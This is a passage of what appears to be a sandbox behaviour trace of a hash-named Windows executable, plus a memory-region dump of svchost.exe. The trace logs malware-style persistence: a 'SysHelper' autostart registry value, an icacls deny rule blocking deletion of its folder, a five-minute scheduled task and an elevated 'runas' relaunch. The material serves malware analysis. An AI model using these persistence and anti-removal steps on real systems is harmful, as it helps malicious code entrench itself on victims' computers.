lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0096.339] lstrcatW (in: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart") returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart" [0096.339] lstrlenW (lpString="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart") returned 152 [0096.339] RegSetValueExW (in: hKey=0x4ec, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart", cbData=0x130 | out: lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart") returned 0x0 [0096.340] RegCloseKey (hKey=0x4ec) returned 0x0 [0096.340] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x120) returned 0x2a55708 [0096.340] SetLastError (dwErrCode=0x0) [0096.340] lstrcpyW (in: lpString1=0x18b968, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0096.340] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac" | out: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac") returned="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac" [0096.340] lstrcatW (in: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0096.340] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e968*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e9c4 | out: lpCommandLine="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18e9c4*(hProcess=0x4e8, hThread=0x4ec, dwProcessId=0xec8, dwThreadId=0xecc)) returned 1 [0096.357] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.368] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.384] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.400] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.467] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.482] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.507] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.512] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.524] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.731] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.743] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.758] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.774] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.790] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.805] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.821] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.843] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.855] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0096.868] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x0 [0096.870] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x8158b0 | out: hHeap=0x720000) returned 1 [0096.870] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a52760 | out: hHeap=0x720000) returned 1 [0096.870] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x120) returned 0x2a113f0 [0096.870] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x120) returned 0x7ea580 [0096.870] CoInitialize (pvReserved=0x0) returned 0x0 [0096.888] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0096.894] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x120) returned 0x2a19f08 [0096.894] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ea2c | out: ppv=0x18ea2c*=0x33ff68) returned 0x0 [0097.997] TaskScheduler:ITaskService:Connect (This=0x33ff68, serverName=0x18e4b8*(varType=0x0, wReserved1=0x2a1, wReserved2=0x13e8, wReserved3=0x2a1, varVal1=0x8f, varVal2=0x120), user=0x18e4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x128), domain=0x18e4d8*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), password=0x18e4e8*(varType=0x0, wReserved1=0x2a1, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x720000)) returned 0x0 [0098.019] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f670 [0098.019] TaskScheduler:ITaskService:GetFolder (in: This=0x33ff68, Path="\\", ppFolder=0x18ea34 | out: ppFolder=0x18ea34*=0x26b0448) returned 0x0 [0098.031] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f670 | out: hHeap=0x720000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f670 [0098.031] ITaskFolder:DeleteTask (This=0x26b0448, Name="Time Trigger Task", flags=0) returned 0x80070002 [0098.035] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f670 | out: hHeap=0x720000) returned 1 [0098.035] TaskScheduler:ITaskService:NewTask (in: This=0x33ff68, flags=0x0, ppDefinition=0x18ea38 | out: ppDefinition=0x18ea38*=0x26b04a0) returned 0x0 [0098.043] TaskScheduler:IUnknown:Release (This=0x33ff68) returned 0x1 [0098.043] ITaskDefinition:get_RegistrationInfo (in: This=0x26b04a0, ppRegistrationInfo=0x18ea0c | out: ppRegistrationInfo=0x18ea0c*=0x26b0560) returned 0x0 [0098.044] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.044] IRegistrationInfo:put_Author (This=0x26b0560, Author="Author Name") returned 0x0 [0098.044] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.044] IUnknown:Release (This=0x26b0560) returned 0x1 [0098.044] ITaskDefinition:get_Principal (in: This=0x26b04a0, ppPrincipal=0x18ea14 | out: ppPrincipal=0x18ea14*=0x26b06f0) returned 0x0 [0098.044] IPrincipal:put_LogonType (This=0x26b06f0, LogonType=3) returned 0x0 [0098.044] IUnknown:Release (This=0x26b06f0) returned 0x1 [0098.044] ITaskDefinition:get_Settings (in: This=0x26b04a0, ppSettings=0x18ea1c | out: ppSettings=0x18ea1c*=0x26b0610) returned 0x0 [0098.045] ITaskSettings:put_StartWhenAvailable (This=0x26b0610, StartWhenAvailable=1) returned 0x0 [0098.045] IUnknown:Release (This=0x26b0610) returned 0x1 [0098.045] ITaskSettings:get_IdleSettings (in: This=0x26b0610, ppIdleSettings=0x18ea00 | out: ppIdleSettings=0x18ea00*=0x26b0680) returned 0x0 [0098.045] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.045] IIdleSettings:put_WaitTimeout (This=0x26b0680, WaitTimeout="PT5M") returned 0x0 [0098.045] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.045] IUnknown:Release (This=0x26b0680) returned 0x1 [0098.045] ITaskDefinition:get_Triggers (in: This=0x26b04a0, ppTriggers=0x18e9fc | out: ppTriggers=0x18e9fc*=0x26b05d0) returned 0x0 [0098.045] ITriggerCollection:Create (in: This=0x26b05d0, Type=1, ppTrigger=0x18ea08 | out: ppTrigger=0x18ea08*=0x26b0750) returned 0x0 [0098.045] IUnknown:Release (This=0x26b05d0) returned 0x1 [0098.045] IUnknown:QueryInterface (in: This=0x26b0750, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18ea24 | out: ppvObject=0x18ea24*=0x26b0750) returned 0x0 [0098.046] IUnknown:Release (This=0x26b0750) returned 0x2 [0098.046] ITrigger:get_Repetition (in: This=0x26b0750, ppRepeat=0x18ea10 | out: ppRepeat=0x18ea10*=0x26b07a0) returned 0x0 [0098.046] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.046] IRepetitionPattern:put_Interval (This=0x26b07a0, Interval="PT5M") returned 0x0 [0098.046] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.046] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.046] IRepetitionPattern:put_Duration (This=0x26b07a0, Duration="") returned 0x0 [0098.070] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.090] ITrigger:put_Repetition (This=0x26b0750, Repetition=0x26b07a0) returned 0x0 [0098.090] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.090] ITrigger:put_Id (This=0x26b0750, Id="Trigger1") returned 0x0 [0098.090] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.090] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.090] ITrigger:put_EndBoundary (This=0x26b0750, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0098.090] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e4e4 | out: lpSystemTimeAsFileTime=0x18e4e4*(dwLowDateTime=0xa2972d60, dwHighDateTime=0x1d8a8d3)) [0098.099] GetLastError () returned 0x0 [0098.116] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x24) returned 0x2a17308 [0098.152] GetLastError () returned 0x0 [0098.161] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0098.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x18e44c) returned 24 [0098.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x18e44c) returned 24 [0098.273] GetLastError () returned 0x0 [0098.273] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x24) returned 0x2a172a8 [0098.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x2a172a8, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0098.273] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xa0) returned 0x7af2b0 [0098.307] GetLastError () returned 0x0 [0098.318] ITrigger:put_StartBoundary (This=0x26b0750, StartBoundary="2022-08-05T16:20:52") returned 0x0 [0098.318] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.318] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a8b9b8 | out: hHeap=0x720000) returned 1 [0098.319] IUnknown:Release (This=0x26b0750) returned 0x1 [0098.319] ITaskDefinition:get_Actions (in: This=0x26b04a0, ppActions=0x18ea18 | out: ppActions=0x18ea18*=0x26b0518) returned 0x0 [0098.319] IActionCollection:Create (in: This=0x26b0518, Type=0, ppAction=0x18ea04 | out: ppAction=0x18ea04*=0x26b07e8) returned 0x0 [0098.320] IUnknown:Release (This=0x26b0518) returned 0x1 [0098.320] IUnknown:QueryInterface (in: This=0x26b07e8, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18ea20 | out: ppvObject=0x18ea20*=0x26b07e8) returned 0x0 [0098.320] IUnknown:Release (This=0x26b07e8) returned 0x2 [0098.320] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.320] IExecAction:put_Path (This=0x26b07e8, Path="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 0x0 [0098.320] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.320] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.320] IExecAction:put_Arguments (This=0x26b07e8, Arguments="--Task") returned 0x0 [0098.320] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.320] IUnknown:Release (This=0x26b07e8) returned 0x1 [0098.321] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc) returned 0x2a1f6b8 [0098.321] ITaskFolder:RegisterTaskDefinition (in: This=0x26b0448, Path="Time Trigger Task", pDefinition=0x26b04a0, flags=6, UserId=0x18e4c0*(varType=0x0, wReserved1=0x2a1, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x720000), password=0x18e4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), LogonType=3, sddl=0x18e4e4*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x128), ppTask=0x18e9ec | out: ppTask=0x18e9ec*=0x26b0868) returned 0x0 [0098.483] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a1f6b8 | out: hHeap=0x720000) returned 1 [0098.483] TaskScheduler:IUnknown:Release (This=0x26b0448) returned 0x0 [0098.483] TaskScheduler:IUnknown:Release (This=0x26b04a0) returned 0x0 [0098.483] IUnknown:Release (This=0x26b0868) returned 0x0 [0098.483] CoUninitialize () [0098.490] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a19f08 | out: hHeap=0x720000) returned 1 [0098.491] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7ea580 | out: hHeap=0x720000) returned 1 [0098.497] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a113f0 | out: hHeap=0x720000) returned 1 [0098.497] GetVersion () returned 0x1db10106 [0098.497] lstrcpyW (in: lpString1=0x18ee50, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0098.497] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0098.497] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0098.497] ShellExecuteExW (in: pExecInfo=0x18ec14*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\kEecfMwgj\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18ec14*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\kEecfMwgj\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0100.131] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x29f48e0 | out: hHeap=0x720000) returned 1 [0100.131] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a55708 | out: hHeap=0x720000) returned 1 [0100.131] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x75c210 | out: hHeap=0x720000) returned 1 [0100.172] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x757218 | out: hHeap=0x720000) returned 1 [0100.172] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x733208 | out: hHeap=0x720000) returned 1 [0100.172] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a18238 | out: hHeap=0x720000) returned 1 [0100.173] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a17940 | out: hHeap=0x720000) returned 1 [0100.193] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7419c8 | out: hHeap=0x720000) returned 1 [0100.215] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x740668 | out: hHeap=0x720000) returned 1 [0100.216] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0100.216] ExitProcess (uExitCode=0x0) [0100.219] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x2a17308 | out: hHeap=0x720000) returned 1 [0100.220] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x73f1c8 | out: hHeap=0x720000) returned 1 Thread: id = 3 os_tid = 0xea8 Thread: id = 4 os_tid = 0xeac Thread: id = 5 os_tid = 0xeb0 Thread: id = 6 os_tid = 0xeb4 Thread: id = 7 os_tid = 0xeb8 Thread: id = 8 os_tid = 0xec4 Thread: id = 61 os_tid = 0xed4 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x89ef000" os_pid = "0x368" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d967" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 470 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 471 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 472 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 473 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 474 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 475 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 476 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 477 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 478 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 479 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 480 start_va = 0x110000 end_va = 0x110fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 481 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 482 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 483 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 484 start_va = 0x150000 end_va = 0x157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 485 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 486 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 487 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 488 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 489 start_va = 0x210000 end_va = 0x21afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 490 start_va = 0x220000 end_va = 0x22cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 491 start_va = 0x230000 end_va = 0x233fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 492 start_va = 0x240000 end_va = 0x249fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 493 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 494 start_va = 0x350000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 495 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 496 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 497 start_va = 0x470000 end_va = 0x473fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" 